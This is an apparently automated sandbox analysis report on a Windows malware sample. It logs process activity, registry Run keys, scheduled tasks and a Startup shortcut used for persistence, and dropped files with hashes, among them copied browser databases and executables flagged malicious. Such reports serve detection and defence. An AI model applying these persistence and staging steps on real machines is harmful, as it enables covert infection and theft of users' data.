Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:47:59	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe modified
08:48:26	API Interceptor	23x Sleep call for process: RegAsm.exe modified
08:48:27	API Interceptor	1x Sleep call for process: j6V5568MqaTghErAlfE30BBB.exe modified
08:48:29	API Interceptor	1x Sleep call for process: Zt2eeOHcoNwxYT3C9R8h67os.exe modified
08:48:35	API Interceptor	2x Sleep call for process: svchost.exe modified
08:48:35	API Interceptor	727x Sleep call for process: explorer.exe modified
08:48:40	API Interceptor	3x Sleep call for process: v7u3knm8W6_1U6jDWPH31qsx.exe modified
08:48:44	API Interceptor	1x Sleep call for process: u7IEXZpDnp1f9d_IZKWnjEtv.exe modified
08:48:50	API Interceptor	1x Sleep call for process: WerFault.exe modified
08:49:14	API Interceptor	61x Sleep call for process: videocompressor32.exe modified
08:49:37	API Interceptor	1x Sleep call for process: jewkkwnf.exe modified
13:48:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
13:48:45	Task Scheduler	Run new task: jewkkwnf HR path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
13:48:52	Task Scheduler	Run new task: jewkkwnf LG path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
13:48:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
13:49:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
13:49:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dell C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe
13:49:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dell C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe
13:50:14	Task Scheduler	Run new task: Firefox Default Browser Agent 91F02B820833AE9E path: C:\Users\user\AppData\Roaming\ahcsduh
13:50:37	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\AFCBKF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\AFCBKF-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\BAFCGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8467337400211222
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
MD5:	7A03CC0EAD0AEFF210C3E60823AAA5EC
SHA1:	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
SHA-256:	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
SHA-512:	8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\CAFBGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\EGHCAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9526
Entropy (8bit):	5.515924904533179
Encrypted:	false
SSDEEP:	192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
MD5:	4580799F1DC5720A7EC1766400E98740
SHA1:	92FD30F47EC545245B934EA492B3C64D5E609AA9
SHA-256:	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
SHA-512:	C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\AEBKKECBGIIJ\EHDHID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\EHDHID-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\FIIIID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\HIIIEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\JDGCGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\KEGCBK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBKKECBGIIJ\KJKJJJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKEGHIJJEH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	363424
Entropy (8bit):	7.987313898927024
Encrypted:	false
SSDEEP:	6144:wF3qqFa1f0K9FDe8RGO93XozFt6tZjEZewycRZEelJYHq2bKEO:m3J6FDe8YOWz2tZwZrZEeDFEO
MD5:	384A847AD2833788FA253433FD2EEA8D
SHA1:	1984D8788FE40BD95A90D7D4E9DEA6C4E4FF6201
SHA-256:	DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
SHA-512:	BCDBD44837629D8881C29A7C7F6A2D4E98B52FBC49952BAD2C89340A1DEE18FAC9987AAA8A3D91905A1F88A216C0E2501201A8665F3DF7D5F627FF71A2418AAC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 70%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f.................2..........~Q... ...`....@.. ....................................`.................................,Q..O....`..............xe..(&...........O............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................`Q......H........A..............................................................VeO..z..?Z..#...b..t.H.xK.......+...,...57....>1.G2.%j.......u.-.E.mR.U....-6W.4.bW...5.>B...].. ..s..f.'.(o...}..k.P..q>j...][T..............s.p}HT-o8.....^.....p.....K7?.n.tEK>^.8.p.....+.bW...{:S...j...Z......z.d2.i....65.u.\|.vUy1....#6......P...}.$..K..\X....$..Z.D....X..q.K.^..I.>.L.j.v...-H.-.K...E.G...)r..C.,y-^6............~MJ).'....K...."p.5...9...A..0..sCU..=.......FYy...

C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exe

Download File

Process:	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2801664
Entropy (8bit):	6.704411900002309
Encrypted:	false
SSDEEP:	49152:UtkjTCvq/irWfqk7ibFuToinSryh3UgXUID83EIQCw6xVw6:Ut1q/IWfqk7ibFu0iL3+4wQCw6xl
MD5:	8C1835DABEA53E9D98E866C950CD260D
SHA1:	8676E818D7A45503B906FD0F3CF4B0EDAF5AC8FC
SHA-256:	B9B88394BC3C964540130E4B5D0A9AC339DC0BBAC35F418EAB872674D5E07AB7
SHA-512:	1444879EA6CFBA3ED187DB1D084425202D9789A38B87D6CC306E1DFDE4246F1C83757581DE7726788C2B2C1C95D8C2E5C19B7E2F352DF12AA6FB52211BB289BB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{.L..................".........d."......."...@...........................*.....).+.......................................".@.....#.XZ............................................................................"..............................text.....".......".................`....rdata...C...."..P....".............@..@.data...xT...0#..0...0#.............@....rsrc....`....#..`...`#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEGHJDGIJECG\BKJDGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEGHJDGIJECG\HDGHJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEGHJDGIJECG\KFBFCA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8467337400211222
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
MD5:	7A03CC0EAD0AEFF210C3E60823AAA5EC
SHA1:	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
SHA-256:	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
SHA-512:	8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.49321266326933416
Encrypted:	false
SSDEEP:	1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Zta2:cJhXC9lHmutpJyiRDeJ/aUKrDgnmg
MD5:	2BD83C7F7C7C087A227F13AED80A136D
SHA1:	73BAAE5D0F7F101B3858752DB5CB9735BF9344E5
SHA-256:	7C9C12E520CA858DE4E62724EA451D52C54180C7557A440648481F6F54B7555F
SHA-512:	FF41B94C1BED7834A4EB88C4D4C670FC2CDDAE29654D8E3F7322116674ADBDD6D09FCC2F58A69826042D93D55A58F69CE66EA4954F9E94AE20DD73201C2F65B0
Malicious:	false
Reputation:	unknown
Preview:	^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xaeec99c2, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7217074396155638
Encrypted:	false
SSDEEP:	1536:LSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:LazaNvFv8V2UW/DLzN/w4wZi
MD5:	A71BA5DA71D80B7A258E6E01195CCDCC
SHA1:	1C575D26695E27922576CAD57133F0872F95E3A4
SHA-256:	B6F59D61A8B1E0A13E00B9660C717A7CFC7E465B489BC089497A18858E1338F9
SHA-512:	51C53A10C3DBB5E8D8831CCDB2462E225C80BF02CA85A803E7A3CB3EB5DE23B8CBE7E35DAD89C4F4124C9ED0B5AD3B1E59841026C0B796091134AD756418F14B
Malicious:	false
Reputation:	unknown
Preview:	...... ...............X\...;...{......................p.D..........{}.$0...\|+.h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{....................................s.$0...\|o....................$0...\|Q..........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08145159497238419
Encrypted:	false
SSDEEP:	3:YOSXKYe2DwsLv/fgsCrZClW/t5I/toll+SHY/Xl+/rQLve:YOSXKz6Vfgs3GjIeAS4M
MD5:	EED7F15B6DDF4BF25777702DEBFE44B1
SHA1:	854CB182E02A2B01B7022CDDB555C33CC79B3040
SHA-256:	CAC05E0605E3C182CAEF7E0FC82598212A5D81D5878474A34EAC195DB2638B95
SHA-512:	ECBEA4CFF6B5959D8C58DFADA35CD31C91C5CDE368EB37BA3197D95C2C1FC1580855518BDCFA3664915F226E718FCF858A1DA0E05BAE8149CA26E88871CD41D8
Malicious:	false
Reputation:	unknown
Preview:	.........................................;...{..$0...\|Q......{}..............{}......{}.vv_Q.....{}....................$0...\|Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_j6V5568MqaTghErA_99e7bbe1b62adeb38fc5159c3b64039b4cf_14a0f05e_e6a1caca-9d87-4ec3-bda7-00beb9d6f179\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8881934826842861
Encrypted:	false
SSDEEP:	96:OzF2NFcNLoH8hbzMldvxKb3UQXIDcQvc6QcEVcw3cE/j0xm0xi+BHUHZ0ownOgH1:ARoBs0BU/HxIaGgzuiFLZ24IO8+oiK
MD5:	BC43A7C5B29C25BC08AA56F5DB6919F8
SHA1:	6D6B8691A28C2340663B3D090709711038D29163
SHA-256:	82B9DFD7F4D60F351D1EDBFD27DE210D9B5977A3B834659E2D99AD2A33F83F41
